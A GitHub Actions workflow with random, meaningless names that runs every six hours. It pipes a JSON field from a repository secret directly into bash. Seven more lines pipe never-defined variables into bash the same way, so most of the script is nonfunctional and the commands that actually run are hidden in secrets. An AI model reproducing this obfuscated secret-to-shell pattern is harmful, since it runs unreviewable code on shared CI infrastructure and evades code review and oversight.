name: yesignx
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yesignx
        env:
          rumta725: ${{ secrets.rumta725 }}
        run: |
          echo $rumta725 | jq -r .tzfw819 | /bin/bash
          echo $nwfw23137 | jq -r .raug530 | /bin/bash
          echo $sqb33954 | jq -r .g1 | /bin/bash
          echo $bluwf8 | jq -r .letij8369 | /bin/bash
          echo $louc68336 | jq -r .gg055 | /bin/bash
          echo $kpd32 | jq -r .lz616 | /bin/bash
          echo $mat4 | jq -r .pirc50 | /bin/bash
          echo $o9205 | jq -r .lsgi7662 | /bin/bash

